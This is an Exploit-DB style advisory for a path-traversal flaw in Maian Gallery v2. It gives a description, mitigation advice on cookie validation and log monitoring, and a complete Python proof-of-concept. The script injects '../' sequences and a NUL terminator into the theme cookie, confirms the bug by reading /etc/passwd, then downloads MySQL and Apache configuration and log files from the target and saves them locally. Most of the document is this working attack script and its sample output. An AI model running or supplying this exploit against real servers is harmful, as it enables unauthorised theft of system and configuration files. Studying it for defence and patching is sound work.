vendor:
Maian Gallery v2
by:
mr_me
5.5
CVSS
MEDIUM
Local File Download
CWE
Product Name: Maian Gallery v2
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu Linux 2.6.32 with PHP v5.3.2

Maian Gallery v2 Local File Download Exploit

This exploit takes advantage of a vulnerability in Maian Gallery v2 that lets an unauthenticated attacker download arbitrary readable files from the web server. As the PoC shows, the injection point is the `mgallery_theme_cookie` cookie: its value is handed to file_get_contents() without path validation, so a `../` traversal sequence followed by a `%00` terminator reaches files outside the gallery directory. Because the file is read with file_get_contents() rather than included or executed, the exploit cannot run PHP code, and the author notes that some file types the web server itself interprets (PHP, conf) cannot be retrieved this way. The PoC was tested on Ubuntu Linux 2.6.32 with PHP 5.3.2 and register_globals = Off; note that the `%00` truncation trick depends on the PHP build accepting an embedded NUL byte in the path, so results may differ on builds that reject it. The author states the flaw was found by an acquaintance and has since been patched; this PoC (Proof of Concept) code is provided for educational purposes.

Mitigation:

Apply the vendor's fix if one is available (the exploit author reports the issue as patched, although this entry lists no patch). Independently of that, the root cause is that a cookie value is used as a file path: the theme name taken from `mgallery_theme_cookie` should be validated against a fixed list of installed themes (or at minimum rejected if it contains `/`, `..` or NUL bytes) before it reaches file_get_contents(), and the web server account should not be able to read files outside the application directory (filesystem permissions, open_basedir). Requests whose cookies carry `../` sequences, as in this PoC, are easy to spot in the access log when checking for exploitation attempts.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# This vulnerability uses file_get_contents()
# so we have some limitations, we cant execute PHP
# and we cant read files that the web server will
# interpret such as PHP, conf etc
#
# tested on: Ubuntu Linux 2.6.32 with php v5.3.2
# register_globals = Off
#
# PRIVATE 0DAY - code by mr_me
# Vulnerability found by my special PHP friend and is now patched, hence this PoC ;)
# 
# mr_me@1337:~$ sudo ~/maian.py -p 127.0.0.1:8080 -t localhost -d /maian_gallery/ -o /home/mr_me/
#
#		| ------------------------------------------------------------- |
#		|        -= Maian Gallery v2 Local File Download Exploit =      |
#		| ---------------------------[ by mr_me ]---------------------- |
#
# (+) Checking target @: http://localhost/maian_gallery/
#
# (+) Testing Proxy...
# (+) Proxy working! 127.0.0.1:8080
# (+) Building Handler..
# (+) File download is working!
# (+) Looking for remote configuration files and saving them to /home/mr_me/
# (+) Found file on remote host @ /var/log/apache2/access.log
# (+) Found file on remote host @ /etc/mysql/my.cnf
# (+) Found file on remote host @ /etc/passwd
# (!) Done!
#

import sys, os, httplib, socket, urllib2, re
from optparse import OptionParser

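# Command-line interface.  All four options are consumed by the script body:
# -t and -d build the target URL, -o is where retrieved files are written, and
# -p (optional) routes every request through an HTTP proxy.  The original
# usage example omitted -o (which the script needs) and used an impossible
# IP address (octet 876); the example now mirrors the sample session above.
usage = "./%prog [<options>] -t [target] -d [directory] -o [output dir to save files]"
usage += "\nExample : ./%prog -p 127.0.0.1:8080 -t localhost -d /maian_gallery/ -o /tmp/loot/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string", action="store", dest="proxy",
                  metavar="SERVER:PORT", help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  metavar="HOST", help="The target server")
parser.add_option("-d", type="string", action="store", dest="directory",
                  metavar="PATH", help="The dir path to maian gallery")
parser.add_option("-o", type="string", action="store", dest="outputDir",
                  metavar="DIR", help="Output dir to save all files")
(options, args) = parser.parse_args()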

def banner():
    """Print the tool's title box to stdout.

    Layout: a leading blank line, three rows each indented by two tabs,
    and a trailing blank line after the last row.
    """
    rows = (
        "| ------------------------------------------------------------ |",
        "|        -= Maian Gallery v2 Local File Download Exploit =-    |",
        "| ---------------------------[ by mr_me ]--------------------- |",
    )
    indent = "\t\t"
    print("\n" + indent + rows[0])
    print(indent + rows[1])
    print(indent + rows[2] + "\n")

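# Bail out early when too few arguments were given: -t, -d and -o are all
# required by the script body, so a command line this short cannot be a
# usable invocation.  The original suite mixed a tab with eight spaces,
# which only parses because Python 2 expands a tab to eight columns and is a
# hard error (TabError) on Python 3.
if len(sys.argv) < 4:
    banner()
    parser.print_help()
    sys.exit(1)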

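def getProxy():
    """Probe the proxy given with -p and return a urllib2 ProxyHandler for it.

    Opens a TCP connection to ``options.proxy`` (``host:port``) purely as a
    reachability check and closes it again; the returned handler is what
    getRequest() installs in its opener.  Exits the program with status 1
    when the proxy times out or cannot be connected to.

    The original fallback clause was ``except (), msg:``, which catches
    nothing in Python, so a refused connection produced a traceback instead
    of the "Proxy Failed" message; it also never closed the probe socket.
    """
    try:
        probe = httplib.HTTPConnection(options.proxy)
        probe.connect()
        # Only a reachability check: release the socket right away instead of
        # leaving it open until garbage collection.
        probe.close()
    except socket.timeout:
        print("\n(-) Proxy Timed Out")
        sys.exit(1)
    except (socket.error, httplib.HTTPException) as err:
        # socket.error covers refused/unreachable; HTTPException covers a
        # malformed host:port (httplib.InvalidURL).
        print("\n(-) Proxy Failed (%s)" % err)
        sys.exit(1)
    return urllib2.ProxyHandler({'http': options.proxy})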

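# Path used for the vulnerability check: /etc/passwd is world-readable on
# any Linux host and contains a recognisable "root:x:" line.
dltest = "etc/passwd"
# Repeated "../" to climb from the gallery directory to "/"; surplus "../"
# once at the root are harmless on Linux.
dotDotSlash = '../../../../../../../../../'
# Files worth collecting once the traversal is confirmed.  /etc/mysql/my.cnf
# and /etc/my.cnf share a basename, which matters when saving them locally.
findAllFiles = ['/var/log/apache2/access_log', '/var/log/apache2/access.log', 
'/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/passwd', '/etc/apache2/httpd.conf']

# -t, -d and -o are all required: without them the URL construction and the
# local file writes below fail with a TypeError on None.
if not (options.target and options.directory and options.outputDir):
    parser.error("-t, -d and -o are required")

# Normalise the target to a full URL.  The original compared
# options.target[0:6] (six characters) with the seven-character string
# 'http://', which can never match, so a target given as a URL ended up as
# "http://http://host".
if not options.target.startswith(('http://', 'https://')):
    options.target = "http://" + options.target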

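def getRequest(localFile):
    """Fetch ``localFile`` from the target through the traversal bug.

    The injection point is the ``mgallery_theme_cookie`` cookie: its value
    is prefixed with ``dotDotSlash`` to escape the gallery directory and
    suffixed with ``%00``, which the server is presumably expected to
    URL-decode into a NUL byte so that whatever the application appends to
    the path is cut off (tested by the author on PHP 5.3.2; builds that
    reject NUL bytes in paths will behave differently).  The PHPSESSID
    value is an arbitrary fixed session id.

    :param localFile: path of the file to read, relative to ``/``; a leading
        ``/`` is tolerated, it only produces a ``..//`` that Linux ignores.
    :return: the response body as a string.  The body of an HTTP error
        response (4xx/5xx) is returned too, so a non-empty result does not
        by itself prove the file was read.
    Exits with status 1 when the target (or the proxy) cannot be reached.
    """
    cookie = ('PHPSESSID=d0tcacup9euftbsb9kd7r55db3; '
              'mgallery_theme_cookie=' + dotDotSlash + localFile + "%00")
    req = urllib2.Request(options.target + options.directory)
    req.add_header('Cookie', cookie)
    # One code path for both modes; the proxy only contributes a handler.
    if options.proxy:
        opener = urllib2.build_opener(getProxy())
    else:
        opener = urllib2.build_opener()
    try:
        resp = opener.open(req)
        try:
            return resp.read()
        finally:
            resp.close()
    except urllib2.HTTPError as error:
        # The application may still have put the file contents (or an error
        # page) into the body of an error status, so hand it to the caller.
        try:
            return error.read()
        finally:
            error.close()
    except urllib2.URLError as error:
        # Connection refused, DNS failure, proxy unreachable, ...: the
        # original let this escape as a traceback.
        print("\n(-) Request to %s failed: %s" % (req.get_full_url(), error.reason))
        sys.exit(1)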

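banner()

print("(+) Checking target @: %s" % (options.target + options.directory))
if options.proxy:
    print("\n(+) Testing Proxy...")
    # getProxy() exits the program if the proxy is unreachable, so the
    # "working" line is only printed once the probe has actually succeeded
    # (the original printed it before any connection was attempted).
    getProxy()
    print("(+) Proxy working! %s" % options.proxy)
    print("(+) Building Handler..")

# /etc/passwd is the canary: a "root:x:" line in the response proves the
# traversal works.  Anything else (error page, empty body) means no go.
check = getRequest(dltest)
if "root:x:" in check:
    print("(+) File download is working!")
    print("(+) Looking for remote configuration files and saving them to %s" % options.outputDir)
    for f in findAllFiles:
        checkFile = getRequest(f)
        # NOTE: a non-empty body is a weak signal -- getRequest() also returns
        # the body of HTTP error responses, so an error page counts as
        # "found".  Inspect the saved files before trusting this list.
        if len(checkFile) > 0:
            print("(+) Found file on remote host @ %s" % f)
            # Derive the local name from the whole remote path, not just its
            # basename: /etc/mysql/my.cnf and /etc/my.cnf would otherwise both
            # land in my.cnf.txt and the second would overwrite the first.
            localName = f.strip('/').replace('/', '_') + '.txt'
            # os.path.join supplies the separator the original concatenation
            # lacked ("-o /home/mr_me" used to produce /home/mr_mepasswd.txt).
            outPath = os.path.join(options.outputDir, localName)
            try:
                # Binary mode: the body is raw file content, not text.
                with open(outPath, 'wb') as ff:
                    ff.write(checkFile)
            except (IOError, OSError) as err:
                print("(-) Cannot save %s locally (%s).. check your path" % (outPath, err))
    print("(!) Done!\n")
else:
    print("(-) Target not vulnerable to the file download vulnerability")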